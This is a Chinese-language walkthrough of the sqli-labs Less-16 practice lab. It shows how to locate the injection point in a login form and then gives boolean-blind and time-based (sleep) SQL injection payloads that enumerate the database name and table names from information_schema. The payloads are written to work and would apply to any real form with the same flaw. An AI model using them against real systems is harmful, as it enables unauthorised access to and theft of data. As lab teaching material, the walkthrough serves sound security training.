1、访问首页,/Less-16/index.php,这里的传参点是表单中的uname、passwd
- 判断是否是数字形传参
- 判断是否有单引号闭合
- 判断是否是双引号闭合
- 判断是否单引号+括号闭合
- 判断是否是双引号+括号闭合
如果以上都不适:哪以上规则都同时加上sleep测试一遍,看是不是存在延时注入
2、 判断字段数
admin") order by 2-- qwe
3、判断数据库长度
-- 盲注
admin") and length(database())=8-- qwe
-- 延时盲注
admin") and if(length(database())=8,sleep(10),0)-- qwe
4、猜解数据库名称,这里就只猜一位演示,数据库名:security
-- 盲注
admin") and ascii(substr(database(),1,1))=115-- qwe
-- 延时盲注
admin") and if(ascii(substr(database(),1,1))=115,sleep(10),0)-- qwe
5、猜解表名长度
-- 盲注
admin") and length((select table_name from information_schema.tables where table_schema='security' limit 3,1))=5-- qwe
-- 延时盲注
admin") and if(length((select table_name from information_schema.tables where table_schema='security' limit 3,1))=5,sleep(10),0)-- qwe
6、猜解表的第一位,后面4位同样的道理,表名:users
-- 盲注
admin") and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 3,1),1,1))=117-- qwe
-- 延时盲注
admin") and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 3,1),1,1))=117,sleep(10),0)-- qwe